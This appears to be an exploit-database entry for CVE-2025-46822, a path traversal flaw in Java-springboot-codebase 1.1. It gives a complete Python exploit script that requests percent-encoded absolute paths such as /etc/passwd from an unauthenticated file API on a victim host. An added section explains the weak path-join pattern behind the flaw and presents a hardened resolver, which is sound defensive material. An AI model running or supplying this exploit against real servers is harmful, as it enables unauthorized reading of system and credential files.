Java-springboot-codebase 1.1 – Arbitrary File Read

Exploit Details

Basic Information

Exploit Title: Java-springboot-codebase 1.1 – Arbitrary File Read
Exploit ID: EDB-ID:52304
Type: exploitdb
Published: 2025-05-25T00:00:00
Modified: 2025-05-25T00:00:00

CVSS Information

CVSS Score: 7.7
Severity: HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N/E:P

CVE Information

  • CVE-2025-46822

Exploit Description

Exploit Title: Java-springboot-codebase 1.1 – Arbitrary…

Exploit Code

# Exploit Title: Java-springboot-codebase 1.1 – Arbitrary File Read
# Google Dork:
# Date: 23/May/2025
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 1.1
# Tested on: Debian Linux
# CVE : CVE-2025-46822

# usage: python3 cve-2025-46822.py http://victim.com /etc/passwd

import argparse

import requests
from urllib.parse import quote


def exploit(target, file_path, output=None):
    # Ensure the file path is absolute
    if not file_path.startswith('/'):
        print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
        file_path = '/' + file_path.lstrip('/')

    # URL-encode the file path, slashes included (safe=''), so the whole
    # absolute path travels as a single segment of /api/v1/files/{path}
    encoded_path = quote(file_path, safe='')

    # Construct the target URL
    endpoint = f"/api/v1/files/{encoded_path}"
    url = target.rstrip('/') + endpoint

    print(f"[*] Attempting to retrieve: {file_path}")
    print(f"[*] Sending request to: {url}")

    try:
        response = requests.get(url, allow_redirects=False, timeout=10)
        if response.status_code == 200:
            print("[+] File retrieved successfully!")
            if output:
                with open(output, 'wb') as f:
                    f.write(response.content)
                print(f"[+] Content saved to: {output}")
            else:
                print("\nFile contents:")
                print(response.text)
        else:
            print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
            print(f"[-] Response: {response.text[:200]}")  # Show first 200 chars of response
    except Exception as e:
        print(f"[-] An error occurred: {str(e)}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
    parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
    parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
    parser.add_argument("-o", "--output", help="Output file to save contents")
    args = parser.parse_args()
    exploit(args.target, args.file_path, args.output)
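The exploit above works by percent-encoding every slash in the requested path, so that a full absolute path such as /etc/passwd arrives as one segment of /api/v1/files/{path}. A server that decodes that segment and joins it to its storage directory without canonicalising and checking containment will hand the file back. The following is an added example, not code from the page or from the Java-springboot-codebase project: it builds the exploit's URL, shows the weak join pattern that this bug class comes from, and puts a hardened resolver beside it. The base directory /srv/app/files, the function names and the server-side behaviour modelled here are assumptions for illustration only; the page does not describe the project's actual implementation.

```python
import os
from pathlib import Path
from urllib.parse import quote, unquote

# Hypothetical storage root for the file API. This is an assumption for the
# example; the real project's directory layout is not described on the page.
BASE_DIR = Path("/srv/app/files")


def exploit_url(target: str, file_path: str) -> str:
    """Build the request the exploit sends: every '/' in the requested path
    is percent-encoded, so the whole absolute path is one URL segment."""
    return target.rstrip("/") + "/api/v1/files/" + quote(file_path, safe="")


def naive_resolve(segment: str) -> Path:
    """The weak pattern behind this bug class (illustrative, not the project's
    code): decode the segment and join it to the base directory.
    os.path.join discards the base when the right-hand side is absolute and
    never collapses '..', so the result can point anywhere on disk."""
    return Path(os.path.join(str(BASE_DIR), unquote(segment)))


def safe_resolve(segment: str) -> Path:
    """Hardened resolver: decode exactly once, refuse absolute paths, NUL bytes
    and double-encoded input, canonicalise, and require the canonical result
    to sit strictly inside the canonical base. Raises ValueError otherwise."""
    decoded = unquote(segment)
    if "%" in decoded:
        raise ValueError("percent sign after decoding: double-encoded input")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    if decoded.startswith(("/", "\\")):
        raise ValueError("absolute path is not allowed")
    base = BASE_DIR.resolve()
    # resolve() follows symlinks for the parts that exist and normalises
    # '..' for the rest, so the containment check sees the real target.
    candidate = (base / decoded).resolve()
    if base not in candidate.parents:
        raise ValueError(f"path escapes base directory: {candidate}")
    return candidate


def is_traversal_blocked(segment: str) -> bool:
    """True when safe_resolve rejects a segment."""
    try:
        safe_resolve(segment)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed inputs: the exploit's own payload, a relative traversal,
    # a double-encoded traversal and a legitimate file name.
    samples = {
        "exploit payload": quote("/etc/passwd", safe=""),
        "relative traversal": quote("../../etc/passwd", safe=""),
        "double encoded": "..%252F..%252Fetc%252Fpasswd",
        "legitimate file": "reports/q1.txt",
    }
    print(exploit_url("http://victim:8080", "/etc/passwd"))
    for label, seg in samples.items():
        print(f"{label:20} naive -> {naive_resolve(seg)} "
              f"| blocked by safe_resolve: {is_traversal_blocked(seg)}")
```

Run it directly to see the exploit URL and the four sample segments side by side. The order of checks matters: rejecting a leftover percent sign after one decode stops double-encoding tricks, the absolute-path test catches the exact payload this exploit uses, and the final containment check on the resolved path is what actually closes relative traversal and symlink escapes, which no amount of string filtering does on its own.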
